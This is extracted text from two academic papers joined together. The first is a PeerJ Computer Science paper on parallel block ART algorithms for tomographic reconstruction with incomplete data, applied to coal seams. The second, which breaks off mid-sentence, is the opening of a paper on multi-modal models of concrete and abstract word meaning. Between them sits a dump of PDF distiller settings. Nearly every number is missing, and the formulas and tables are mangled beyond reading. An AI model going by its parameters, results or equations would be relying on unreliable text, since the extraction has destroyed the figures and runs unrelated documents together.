convergence of art algorithm by using the physical property of the studied it is easy to notice that a single row of length n has at most n − nonzero elements pleszczyński ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ phenomenon—each sort of matter is characterized by the specific capacity of absorbing the energy of penetrating radiation. value describing this capacity is nonnegative, therefore after determining the solution x(k + ) we operate with the aid of operator c, called in literature the constraining operator, taking in this paper the following form c : rn ! rn; cðx ; x ; . . . ; xnÞ ¼ ðy ; y ; . . . ; ynÞ; ( ) where yi ¼ xi; xi � ; ; xi < ; � � i � n ( ) several years after introducing the art algorithm, it has been proven in paper (trummer, ) that this algorithm is convergent if < λk = λ < , whereas in case when λ does not have to be constant, the art algorithm is convergent if < liminf λk ≤ limsup λk < . in specific case when λk = λ = the art algorithm is the kaczmarz algorithm. obviously there exist many other algebraic algorithms, like for example the algorithms art- (herman, ), mart (gordon, bender & herman, ; verhoeven, ), sirt (gilbert, ), sart (andersen & kak, ) and others. we focus in the current paper on the art algorithm (and its parallel adaptations) because, as the research shows, the other algorithms are characterized by the same convergence rate and the algorithm art is simple in implementation which is its great advantage. x x x x x x x x h h h figure geometric interpretation of the kaczmarz algorithm. full-size doi: . /peerj-cs. /fig- pleszczyński ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ the algebraic algorithms, adapted to the problem with incomplete set of data, appeared to be convergent, stable and detecting the non-transparent element, which means that they are very useful (hetmaniok, ludew & pleszczyński, ). however the main disadvantage of these algorithms is their convergence speed—less than iterations is required for solving the problem with complete set of data , whereas few hundred, or even more than one thousand, iterations is often needed for solving the problem with incomplete set of data. the stopping condition for the art algorithm (as well as for the other algorithms discussed in this article) can be defined as the assumed number of executed iterations or the assumed precision of the obtained approximate solution. system of algebraic linear equations similar to considered one are overdetermined ad as a rule are inconsistent. the kaczmarz method and its modifications converge to some “pseudosolution”. the research concerning this subject were also performed—one can notice that the successive approximate solutions, after reaching some level of precision, “circulate” around the theoretical exact solution, however they are contained within some n-dimensional sphere with central point located in this exact solution and radius proportional to the level of error burdening the input data. one of possibilities to defeat the described disadvantage consists in applying the parallel calculations in the process of determining the solution of system ( ). among many algorithms using this approach we select the parallel block algorithms. parallel block algorithms parallel block algorithms are created to use the parallel work of many processors/threads, however the number of threads is relatively small (differently like in case of using the threads of graphics cards with cuda technology). the general concept of these algorithms consists in partition of the system of eq. ( ) into blocks (the number of blocks corresponds to the number of used threads) so that the set of indices of rows of matrix a is presented in the form of sum: { , ,…,m} = b ∪ b ∪…∪ bm, where, in the standard approach, we have bi ∩ bj = Ø for i ≠ j, and the cardinalities of sets bi, ≤ i ≤ m, are equal more or less (very often the blocks are formed so that the first block includes about mm first rows, the second block includes mm next rows, and so on). the blocks work parallel in such a way that they have the same initial vector (starting solution) x(k), k ≥ , in every block the algorithm (for example the art algorithm) is performed on the rows of matrix a belonging to this block, next, after executing one iteration (by using all available rows), the approximate solution y(k,i), k ≥ , ≤ i ≤ m, from each block is returned. after that the solutions are averaged and such average solution x(k + ) can serve as the initial solution for all blocks in the next iteration. graphical illustration of the parallel block algorithm is presented in fig. . the fig. shows the bp algorithm in more detail (block algorithm). assuming the partition of matrix a into blocks (vector b of projections is partitioned in the same way), the parallel block algorithm pb (introduced by the author) can be presented in the following way: we select the initial solution x( ), we calculate the solution x(k + ), k ≥ , according to formula one iteration means the consideration of all lines in system ( ), that is the execu- tion of m ( ) projections. pleszczyński ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ xðkþ Þ ¼ xm i¼ wiy ðkþ ;iÞ ( ) where yðkþ ;iÞ ¼ qixðkÞ ( ) whereas qi denotes the operator composing the operators p, that is qi ¼ pi;b pi;b . . . pi;bs ( ) where operator pi,bj means the execution of projection ( ), defined in the art algorithm, onto the jth hyperplane of block bi possessing s elements. component wi, occurring in formula ( ), is responsible for averaging the solutions obtained from the respective blocks and is defined by the square matrix of dimension n having the following form wi ¼ diagfwi ; wi ; . . . ; wing where wij ¼ x q bi aq;j xm q¼ aq;j and aq,j denotes the element of matrix a located in qth row and jth column, ≤ i ≤ m, ≤ j ≤ n. problem with the incomplete set of data problem of the incomplete set of data in the classical form is discussed, for example, in andersen ( ). the incomplete set of data is presented there, and also in many other x k b b bm m yk yk yk m x k+ figure scheme of the parallel block algorithm. full-size doi: . /peerj-cs. /fig- pleszczyński ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ publications, in the following way: for the parallel beam there is executed directions of scanning (for angles of range between and degrees) and in each beam there are rays (then the set of data is complete). the scans at angles between and degrees are missing in this set (which generates the incomplete set of data—about % of data is missing in this set, about % of data is given there). however in the considered case we are very far from this situation—the scans are performed only between two opposite walls, which means that the scanning angles are included within the right angle, so one can say that we have % of data in our disposal (this estimation is still too optimistic). the author analyzed such situation and came to the conclusion that the interior of the figure scheme of the parallel block algorithm. full-size doi: . /peerj-cs. /fig- pleszczyński ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ examined object can be reconstructed also in such conditions (convergence, stability, influence of noises, occurrence of non-transparent elements were investigated), but this reconstruction takes quite a long time. therefore the solutions, different than the ones used in various classical approaches, were sought and are still required (the author tested them in his cited paper), like: selection (on the way of appropriate investigations) of optimal values of parameters, other sorts of algorithms, sorting the rows in matrix of the system of equations, introduction of chaotic and asynchronous algorithms, introduction of parallel algorithms (parallel-block and block-parallel). separate application of these approaches (or of their combinations) caused, the most often, the improvement of the convergence speed, however this improvement was not big enough to accept it as sufficient. similar studies were also carried out in other studies (e.g., jiang & wang ( ), most often assuming a complete set of data—therefore this case requires separate studies). for example, sørensen & hansen ( ) shows that the row sorting effect of a does not significantly improve time. many authors have studied block and parallel algorithms (also block parallel algorithms), including graphs, many other approaches were also used (a large part of them was also investigated by the author for this issue) (censor et al., ; drummond et al., ; elfving & nikazad, ; gordon & gordon, ; sørensen & hansen, ; torun, manguoglu & aykanat, ; zhang & sameh, ). as we mentioned before, the computer tomography, considered in its classical sense, requires the projection of a very good quality (many scanning angles, many rays in one beam). however in study of some problems, like for example in examination of the mine coal seam, the size of investigated object or difficult access to it does not allow to get such type of projection. then we have the problem with the incomplete set of data. the most often we can use the data obtained only between two opposite walls of the studied object (such system will be called the ( × ) system), and sometimes between pairs of two opposite walls (such system will be called the ( × , × ) system). system ( × ) is presented in fig. and an example of its application (coal seam testing) is shown in the fig. . mathematical models of phantoms in the seam of coal, in which we search for dangerous areas of compressed gas or unwanted interlayers of barren rocks, the distribution of density is discrete and the densities of included elements differ from each other. therefore the models used for testing the convergence of discussed algorithms possess the discrete distribution of high contrast. thus, the two-dimensional function describing the distribution of density takes the following form f ðx; yÞ ¼ c ; ðx; yÞ d � e; c ; ðx; yÞ d � e; cs; ðx; yÞ ds � e; >>< >>: ( ) where ci r, ≤ i ≤ s, e = {(x,y) − ≤ x, y ≤ }, and the regions di, ≤ i ≤ s, are disjoint (more precisely, the area if their common part is equal to zero). pleszczyński ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ an additional parameter, affecting the convergence of investigated algorithm pb, is the number of sources and detectors. this parameter is denoted by pkt and influences directly the dimension of matrix a of system ( )—it determines the number of rows in this matrix. we assume in this article that the number of sources and detectors are equal and we reject (for uniqueness—we eliminate the case when the ray runs along the mesh discretizing the square e) the first and the last projection. then we have m = pkt − . results of experiments to show that the pb algorithm is convergent in practise (not only in theory) one has to prove that it is possible to select the optimal values of parameters m and λ for the given resolution (number of pixels n = n), similarly like in case of the sequential algorithms. obviously, for such selected values of reconstruction parameters it should be possible to retrieve the sought function with the given precision. table presents the times needed to achieve the error Δ < . in reconstruction of function f (x,y) for n = with the use of threads, depending on the values of parameters m and λ, whilst d ¼ max �i�n f ðpikiÞ � ~f ðpikiÞ �� �� ( ) figure system ( × ) where —sources of rays, —object under research, —rays, —detectors. full-size doi: . /peerj-cs. /fig- as the research shows, the exact optimal values are impossible to determine, because they depend on various ele- ments, like the expected value of para- meter l, form of function f (x, y), the system of data collection and so on. whereas it is possible to observe some approximate relation between these values. pleszczyński ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ e figure the scheme of a coal bed working: —sources; —detectors; —unmined coal; —heading; —longwall with mechanized lining, belt conveyor flight, heading machine so on; —caving or filling; e—researching coal bed. full-size doi: . /peerj-cs. /fig- table dependence of the reconstruction time [s] for the given n on the values of parameters m and λ (value > means the time longer than s). λ ↓ m → . > > > > > > . . . . . > > > . . . . . . . . . > . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . > > > > > > > > λ b m → . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . pleszczyński ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ where piki is the ith pixel, f denotes the exact values of sought function, whereas ~f describes its reconstructed values. error ( ) takes this form only in the initial stages of algorithm usability testing. we then refer to an exact solution, which we do not know of course in real cases. however, such an approach has an undoubted advantage—by conducting a series of experiments, we can estimate the number of iterations (for given values of the reconstruction parameters) to obtain a given quality of reconstruction. the obtained results are like expected. the shortest time is for m = and λ = . (more detailed investigation around this value of λ, with step . , showed that this is the best result in this case). calculations executed for other resolutions and other functions describing the distribution of density gave similar results concerning the proportion of n to m and to the value of λ. the literature (see e.g., gordon & gordon, ) shows that in the case of a complete set of data, the selection of the optimal λ parameter depends heavily on the number of threads. the fig. shows the reconstruction time (quotient of the time tλ for obtaining the error ( ) Δ < . for a given value of λ and for a given number of threads and the time tmax maximum for this number of threads) from the number of threads th. in the case of a incomplete set of data, the situation is different. for any number of threads, the optimal value for λ is similar. the results for the number of threads , and are also interesting: the algorithm converges there for . ≤ λ ≤ (the fig. it is shown for λ ≤ ). table presents optimal values of the λ parameter for the step s = . and for the step s = . . the research was carried out for many different functions of the density distribution and for many values of the reconstruction parameters selected for these functions. we now present graphically the obtained results for two selected examples. the first presented t t figure dependence of the reconstruction on λ parameter value for an equal number of threads. full-size doi: . /peerj-cs. /fig- pleszczyński ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ function of the density distribution will be the function f , which according to the formula ( ) takes the form f ðx; yÞ ¼ ; ðx; yÞ ½� : ; � : � ½� : ; : ; ðx; yÞ ½� : ; : � ½� : ; : ; ðx; yÞ ½� : ; : � ½ : ; : ; ðx; yÞ ½ : ; : � ½ : ; : ; otherwise: >>>>< >>>>: figure presents the reconstruction of function f for n = , m = , λ = . and threads. figure presents the error Δ (see ( )) of this reconstruction. the second presented function of the density distribution will be the function f , which according to the formula ( ) takes the form f ðx; yÞ ¼ ; ðx; yÞ ½ ; : � ½ : ; : ; ðx; yÞ ½� : ; � ½� : ; : ; ðx; yÞ ½� : ; � : � ½� : ; : ; ðx; yÞ ½ ; : � ½� : ; � : ; otherwise >>>>< >>>>: figure presents the reconstruction of function f for n = , m = , λ = . and threads. figure presents the error Δ (see ( )) of this reconstruction. figure reconstructed function f (x,y) for n = , m = , λ = . and threads. full-size doi: . /peerj-cs. /fig- table optimal values of the λ parameter for the step s = . and for the step s = . . s ↓ th → . . . . . . . . . . . . . . . . . . . . . . pleszczyński ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ in the next figures (figs. and ) we demonstrate, for selected examples, the correctness of behavior of the reconstruction parameters, that is, more precisely, the number of iterations required to obtain the given error Δ depending on the number of blocks, together with the time needed to execute , iterations depending on the number of blocks. figure the error Δ of the reconstruction of the function f (x,y) for n = , m = , λ = . and threads. full-size doi: . /peerj-cs. /fig- figure reconstructed function f (x,y) for n = , m = , λ = . and threads. full-size doi: . /peerj-cs. /fig- pleszczyński ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ computer programs, realizing the presented research, were written in the following languages: c# from visual studio and mathematica . the study was conducted with the aid of computer with windows professional system, equipped with gb ram, processor intel core i . ghz ( threads). it is also worth to mention that the largest considered systems of equations possessed , unknown elements (n = ) and were composed from , equations (m = ) and the data concerning the coefficients of such systems used more that gb of disk space. figure the error Δ of the reconstruction of the function f (x,y) for n = , m = , λ = . and threads. full-size doi: . /peerj-cs. /fig- figure the number of iterations (iter.) needed to get the error Δ < . depending on the number of blocks, n = , m = , λ = , f (x,y). full-size doi: . /peerj-cs. /fig- pleszczyński ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ conclusions the conducted investigations, presented in this article, show that the introduced pb algorithm is useful, also in practice. for the assumed resolution one can select, with big precision, the values of other reconstruction parameters, in order to minimize the required calculations, however, the selection of optimal values of the reproduction parameters is of a different nature than in the classical task. dividing matrix a of equation system ( ) into blocks, the information about the examined object is poorer in each block (in comparison with information delivered by the full matrix a), therefore the number of iterations increases with the number of blocks. research has shown that this increase is linear. if we refer to the number of iterations for one thread, then as the number of blocks increases, the number of iterations increases, and the increase is approximately . the number of iterations for one thread (this is shown in fig. , but for other cases it is similar). the application of bigger number of threads reduces significantly the time needed to execute the iterations. in the initial phase, increasing the number of threads reduces the execution time of , iterations. on average, the execution time for , iterations on n threads is approximately . % of the execution time for , iterations on n − threads. then (from threads) this percentage drops significantly (the reason is a much smaller amount of information that individual blocks have). in future there are planned the further tests for optimizing the reconstruction parameters in order to develop the biggest possible advantage of pb algorithm, and other algorithms using the parallel calculations, over the sequential algorithm. the current paper gives the basis for this planned research. additional information and declarations funding the author received no funding for this work. . . . . . . . . . . figure execution time , iterations (iter.) depending on the number of blocks, n = , m = , λ = , f (x,y). full-size doi: . /peerj-cs. /fig- pleszczyński ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ competing interests the author declares that they have no competing interests. author contributions � mariusz pleszczyński conceived and designed the experiments, performed the experiments, analyzed the data, performed the computation work, prepared figures and/ or tables, authored or reviewed drafts of the paper, and approved the final draft. data availability the following information was supplied regarding data availability: the program codes are available in the supplemental files. supplemental information supplemental information for this article can be found online at http://dx.doi.org/ . / peerj-cs. #supplemental-information. references andersen a. . algebraic reconstruction in ct from limited views. ieee transactions in medical imaging ( ): – doi . / . . andersen a, kak a. . simultaneous algebraic reconstruction technique (sart): a superior implementation of the art algorithm. ultrasonic imaging ( ): – doi . / . averbuch a, shkolnisky y. . d fourier based discrete radon transform. applied and computational harmonic analysis ( ): – doi . /s - ( ) - . censor y, elfving t, herman g, nikazad t. . on diagonally relaxed orthogonal projection methods. siam journal on scientific computing ( ): – doi . / . cozzolino m, gentile v, mauriello p, peditrou a. . non-destructive techniques for building evaluation in urban areas: the case study of the redesigning project of eleftheria square (nicosia, cyprus). applied sciences ( ): doi . /app . donegani m, ferrarazzo g, marra s, miceli a, raffa s, bauckneht m, morbelli s. . positron emission tomography-based response to target and immunotherapies in oncology. medicina ( ): doi . /medicina . drummond l, duff i, guivarch r, ruiz d, zenadi m. . partitioning strategies for the block cimmino algorithm. journal of engineering mathematics ( ): – doi . /s - - - . elfving t, nikazad t. . properties of a class of block-iterative methods. inverse problems ( ): doi . / - / / / . gilbert p. . iterative methods for the three-dimensional reconstruction of an object from projections. journal of theoretical biology ( ): – doi . / - ( ) - . gong l, nie l, xu y. . geometrical and topological analysis of pore space in sandstones based on x-ray computed tomography. energies ( ): doi . /en . gordon d, gordon r. . component-averaged row projections: a robust, block-parallel scheme for sparse linear systems. siam journal on scientific computing ( ): – doi . / . pleszczyński ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . / . http://dx.doi.org/ . / http://dx.doi.org/ . /s - ( ) - http://dx.doi.org/ . / http://dx.doi.org/ . /app http://dx.doi.org/ . /medicina http://dx.doi.org/ . /s - - - http://dx.doi.org/ . / - / / / http://dx.doi.org/ . / - ( ) - http://dx.doi.org/ . /en http://dx.doi.org/ . / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ gordon r, bender r, herman g. . algebraic reconstruction techniques (art) for three- dimensional electron microscopy and x-ray photography. journal of theoretical biology ( ): – doi . / - ( ) - . guan h, gordon r. . computed tomography using algebraic reconstruction techniques with different projection access schemes: a comparison study under practical situation. physics in medicine and biology ( ): – doi . / - / / / . herman g. . a relaxation method for reconstructing objects from noisy x-rays. mathematical programming ( ): – doi . /bf . hetmaniok e, ludew j, pleszczyński m. . examination of stability of the computer tomography algorithms in case of the incomplete information for the objects with non- transparent elements. in: wituła r, bajorska-harapińska b, hetmaniok e, słota d, trawiński t, eds. selected problems on experimental mathematics. gliwice: silesian university of technology press, – . hounsfield g. . a method of and apparatus for examination of a body by radiation such as x- ray or gamma radiation. patent specification . the patent office. jiang m, wang g. . convergence studies on iterative algorithms for image reconstruction. ieee transactions on medical imaging ( ): – doi . /tmi. . . kaczmarz s. . angenäherte auflösung von systemen lineare gleichungen. international academy of political science letter : – . kamath g, shi l, song w-z, lees j. . distributed travel-time seismic tomography in large-scale sensor networks. journal of parallel and distributed computing ( – ): – doi . /j.jpdc. . . . lewitt r. . reconstruction algorithms: transform methods. proceedings of the ieee ( ): – doi . /proc. . . louis a. a. nonuniqueness in inverse radon problems: the frequency distribution of the ghosts. mathematische zeitschrift ( ): – doi . /bf . louis a. b. orthogonal function series expansions and the null space of the radon transform. siam journal of mathematical analysis ( ): – doi . / . malczewski k. . image resolution enhancement of highly compressively sensed ct/pet signals. algorithms ( ): doi . /a . natterer f. . the mathematics of computerized tomography. hoboken: wiley. radon j. . Über die bestimmung von funktionen durch ihre integalwerte längs gewisser mannigfaltigkeiten. berichte sächsische akademie der wissenschaften : – . sørensen h, hansen p. . multicore performance of block algebraic iterative reconstruction methods. siam journal on scientific computing ( ): – doi . / . tanabe k. . projection method for solving a singular system of linear equations and its applications. numerische mathematik ( ): – doi . /bf . torun f, manguoglu m, aykanat c. . a novel partitioning method for accelerating the block cimmino algorithm. siam journal on scientific computing ( ): – doi . / m . trummer m. . a note on the art of relaxation. computing ( – ): – doi . /bf . verhoeven d. . multiplicative algebraic computed tomography algorithms for the reconstruction of multidirectional interferometric data. optical engineering ( ): – doi . / . . pleszczyński ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . / - ( ) - http://dx.doi.org/ . / - / / / http://dx.doi.org/ . /bf http://dx.doi.org/ . /tmi. . http://dx.doi.org/ . /j.jpdc. . . http://dx.doi.org/ . /proc. . http://dx.doi.org/ . /bf http://dx.doi.org/ . / http://dx.doi.org/ . /a http://dx.doi.org/ . / http://dx.doi.org/ . /bf http://dx.doi.org/ . / m http://dx.doi.org/ . /bf http://dx.doi.org/ . / . http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ waldén j. . analysis of the direct fourier method for computer tomography. ieee transactions in medical imaging ( ): – doi . / . . yao y, liu c, xu c. . a new gnss-derived water vapor tomography method based on optimized voxel for large gnss network. remote sens ( ): doi . /rs . zhang z, sameh a. . block row projection method based on m-matrix splitting. journal of computational and applied mathematics ( ): – doi . /j.cam. . . . pleszczyński ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . / . http://dx.doi.org/ . /rs http://dx.doi.org/ . /j.cam. . . https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. implementation of the computer tomography parallel algorithms with the incomplete set of data introduction conclusions references << /ascii encodepages false /allowtransparency false /autopositionepsfiles true /autorotatepages /none /binding /left /calgrayprofile (dot gain %) /calrgbprofile (srgb iec - . ) /calcmykprofile (u.s. web coated \ swop\ v ) /srgbprofile (srgb iec - . ) /cannotembedfontpolicy /warning /compatibilitylevel . /compressobjects /off /compresspages true /convertimagestoindexed true /passthroughjpegimages true /createjobticket false /defaultrenderingintent /default /detectblends true /detectcurves . /colorconversionstrategy /leavecolorunchanged /dothumbnails false /embedallfonts true /embedopentype false /parseiccprofilesincomments true /embedjoboptions true /dscreportinglevel /emitdscwarnings false /endpage - /imagememory /lockdistillerparams false /maxsubsetpct /optimize true /opm /parsedsccomments true /parsedsccommentsfordocinfo true /preservecopypage true /preservedicmykvalues true /preserveepsinfo true /preserveflatness true /preservehalftoneinfo false /preserveopicomments false /preserveoverprintsettings true /startpage /subsetfonts true /transferfunctioninfo /apply /ucrandbginfo /preserve /useprologue false /colorsettingsfile (none) /alwaysembed [ true ] /neverembed [ true ] /antialiascolorimages false /cropcolorimages true /colorimageminresolution /colorimageminresolutionpolicy /ok /downsamplecolorimages false /colorimagedownsampletype /average /colorimageresolution /colorimagedepth /colorimagemindownsampledepth /colorimagedownsamplethreshold . /encodecolorimages true /colorimagefilter /flateencode /autofiltercolorimages false /colorimageautofilterstrategy /jpeg /coloracsimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /colorimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /jpeg coloracsimagedict << /tilewidth /tileheight /quality >> /jpeg colorimagedict << /tilewidth /tileheight /quality >> /antialiasgrayimages false /cropgrayimages true /grayimageminresolution /grayimageminresolutionpolicy /ok /downsamplegrayimages false /grayimagedownsampletype /average /grayimageresolution /grayimagedepth /grayimagemindownsampledepth /grayimagedownsamplethreshold . /encodegrayimages true /grayimagefilter /flateencode /autofiltergrayimages false /grayimageautofilterstrategy /jpeg /grayacsimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /grayimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /jpeg grayacsimagedict << /tilewidth /tileheight /quality >> /jpeg grayimagedict << /tilewidth /tileheight /quality >> /antialiasmonoimages false /cropmonoimages true /monoimageminresolution /monoimageminresolutionpolicy /ok /downsamplemonoimages false /monoimagedownsampletype /average /monoimageresolution /monoimagedepth - /monoimagedownsamplethreshold . /encodemonoimages true /monoimagefilter /ccittfaxencode /monoimagedict << /k - >> /allowpsxobjects false /checkcompliance [ /none ] /pdfx acheck false /pdfx check false /pdfxcompliantpdfonly false /pdfxnotrimboxerror true /pdfxtrimboxtomediaboxoffset [ . . . . ] /pdfxsetbleedboxtomediabox true /pdfxbleedboxtotrimboxoffset [ . . . . ] /pdfxoutputintentprofile (none) /pdfxoutputconditionidentifier () /pdfxoutputcondition () /pdfxregistryname () /pdfxtrapped /false /createjdffile false /description << /chs <feff f f fd e b bbe b a b efa ef a fc c a c f f fdb c ad d cf a ef ee f f f c f e ee ca f ad c f b efa > /cht <feff f f e b a d f e efa acb f ef ef c a f c f f e a f ad c cea c a ef ee f f f c f e ee ca f ad c f b f df efa acb ef > /dan <feff e c c e e c f f d f b d e c b c b e e c c b f b c e e e e f d f b d e b e e e f c c f e f e e> /deu <feff e e e c c e e a d c c e f e f d f b d e e c f e e e f b b f d b e e f f d e e a e d f e e c c d f b d e b f e e e d f e f e f f f e e e> /esp <feff c f e f e f d e f f f e d f e c e d f f f d e f f e e e f d e f f f e f c f e f e f f e> /fra <feff c a f f e e e f d e f f e d f e c e d d e e c f d e e e e ea f e f c e f e f e c e e> /ita <feff c a a d f a f e f d e f e d c e d e f f b f e f d e f f e f f e f f e f e e> /jpn <feff ad c cea fa b f f e f c b f f e e b cea b fdd c d e c b af c c d d ea f bf e e f f d eb fc d b e e a d b a f c c f d a a eb f f a f e ee d b f c d e > /kor <feffc c c c c acc a d c ec b c a d cd d d b b d bc f ad c ae c d c c ace d c c b c c c c d f bb c cb c c c d b c b e e c b ac c c c b c bb c cb f bc f f e c c c c d c c c f c c c b b c b e e> /nld (gebruik deze instellingen om adobe pdf-documenten te maken voor kwaliteitsafdrukken op desktopprinters en proofers. de gemaakte pdf-documenten kunnen worden geopend met acrobat en adobe reader . en hoger.) /nor <feff b e e c c e e c e f f d f b d e f b f b c e f b c c f f e d f b d e e b e e e f c c f e c c e e> /ptb <feff c a f e e f f d f d e f f d f c d d f b f f f f e f f d e f f f d f f d f f f f e f f f e> /suo <feff b e e e e e b c b e c f f d f b d e a c b f f e c f a f e e c f d f b d e f e f c c a f e a c c a d d c c e> /sve <feff e e e e e e c c e e e f d c c b f d f b d e f b c b e e c b f f b f b e b d f b d e b e f e f f f e f e e> /enu (use these settings to create adobe pdf documents for quality printing on desktop printers and proofers. created pdf documents can be opened with acrobat and adobe reader . and later.) >> /namespace [ (adobe) (common) ( . ) ] /othernamespaces [ << /asreaderspreads false /cropimagestoframes true /errorcontrol /warnandcontinue /flattenerignorespreadoverrides false /includeguidesgrids false /includenonprinting false /includeslug false /namespace [ (adobe) (indesign) ( . ) ] /omitplacedbitmaps false /omitplacedeps false /omitplacedpdf false /simulateoverprint /legacy >> << /addbleedmarks false /addcolorbars false /addcropmarks false /addpageinfo false /addregmarks false /convertcolors /noconversion /destinationprofilename () /destinationprofileselector /na /downsample bitimages true /flattenerpreset << /presetselector /mediumresolution >> /formelements false /generatestructure true /includebookmarks false /includehyperlinks false /includeinteractive false /includelayers false /includeprofiles true /multimediahandling /useobjectsettings /namespace [ (adobe) (creativesuite) ( . ) ] /pdfxoutputintentprofileselector /na /preserveediting true /untaggedcmykhandling /leaveuntagged /untaggedrgbhandling /leaveuntagged /usedocumentbleed false >> ] >> setdistillerparams << /hwresolution [ ] /pagesize [ . . ] >> setpagedevice multi-modal models for concrete and abstract concept meaning felix hill computer laboratory university of cambridge fh @cam.ac.uk roi reichart technion - iit haifa, israel roiri@ie.technion.ac.il anna korhonen computer laboratory university of cambridge alk @cam.ac.uk abstract multi-modal models that learn semantic rep- resentations from both linguistic and percep- tual input outperform language-only models on a range of evaluations, and better reflect human concept acquisition. most perceptual input to such models corresponds to concrete noun concepts and the superiority of the multi- modal approach has only been established when evaluating on such concepts. we there- fore investigate which concepts can be effec- tively learned by multi-modal models. we show that concreteness determines both which linguistic features are most informative and the impact of perceptual input in such mod- els. we then introduce ridge regression as a means of propagating perceptual informa- tion from concrete nouns to more abstract con- cepts that is more robust than previous ap- proaches. finally, we present weighted gram matrix combination, a means of combining representations from distinct modalities that outperforms alternatives when both modalities are sufficiently rich. introduction what information is needed to learn the meaning of a word? children learning words are exposed to a diverse mix of information sources. these include clues in the language itself, such as nearby words or speaker intention, but also what the child perceives about the world around it when the word is heard. learning the meaning of words requires not only a sensitivity to both linguistic and perceptual input, but also the ability to process and combine informa- tion from these modalities in a productive way. many computational semantic models represent words as real-valued vectors, encoding their rela- tive frequency of occurrence in particular forms and contexts in linguistic corpora (sahlgren, ; tur- ney et al., ). motivated both by parallels with human language acquisition and by evidence that many word meanings are grounded in the percep- tual system (barsalou et al., ), recent research has explored the integration into text-based models of input that approximates the visual or other sen- sory modalities (silberer and lapata, ; bruni et al., ). such models can learn higher-quality semantic representations than conventional corpus- only models, as evidenced by a range of evaluations. however, the majority of perceptual input for the models in these studies corresponds directly to con- crete noun concepts, such as chocolate or cheese- burger, and the superiority of the multi-modal over the corpus-only approach has only been established when evaluations include such concepts (leong and mihalcea, ; bruni et al., ; roller and schulte im walde, ; silberer and lapata, ). it is thus unclear if the multi-modal approach is ef- fective for more abstract words, such as guilt or obe- sity. indeed, since empirical evidence indicates dif- ferences in the representational frameworks of both concrete and abstract concepts (paivio, ; hill et al., ), and verb and noun concepts (markman and wisniewski, ), perceptual information may not fulfill the same role in the representation of the various concept types. this potential challenge to the multi-modal approach is of particular practical importance since concrete nouns constitute only a small proportion of the open-class, meaning-bearing words in everyday language (section ). in light of these considerations, this paper ad- dresses three questions: ( ) which information sources (modalities) are important for acquiring concepts of different types? ( ) can perceptual in- put be propagated effectively from concrete to more abstract words? ( ) what is the best way to combine information from the different sources? we construct models that acquire semantic repre- sentations for four sets of concepts: concrete nouns, abstract nouns, concrete verbs and abstract verbs. the linguistic input to the models comes from the recently released google syntactic n-grams corpus (goldberg and orwant, ), from which a selec- tion of linguistic features are extracted. perceptual input is approximated by data from the mcrae et al. ( ) norms, which encode perceptual proper- ties of concrete nouns, and the espgame dataset (von ahn and dabbish, ), which contains man- ually generated descriptions of , images. to address ( ) we extract representations for each concept type from combinations of information sources. we first focus on different classes of lin- guistic features, before extending our models to the multi-modal context. while linguistic information overall effectively reflects the meaning of all con- cept types, we show that features encoding syntac- tic patterns are only valuable for the acquisition of abstract concepts. on the other hand, perceptual in- formation, whether directly encoded or propagated through the model, plays a more important role in the representation of concrete concepts. in addressing ( ), we propose ridge regression (myers, ) as a means of propagating features from concrete nouns to more abstract concepts. the regularization term in ridge regression encourages solutions that generalize well across concept types. we show that ridge regression effectively propagates perceptual information to abstract nouns and con- crete verbs, and is overall preferable to both lin- ear regression and the method of johns and jones ( ) applied to a similar task by silberer and la- pata ( ). however, for all propagation methods, the impact of integrating perceptual information de- pends on the concreteness of the target concepts. in- deed, for abstract verbs, the most abstract concept type in our evaluations, perceptual input actually de- grades representation 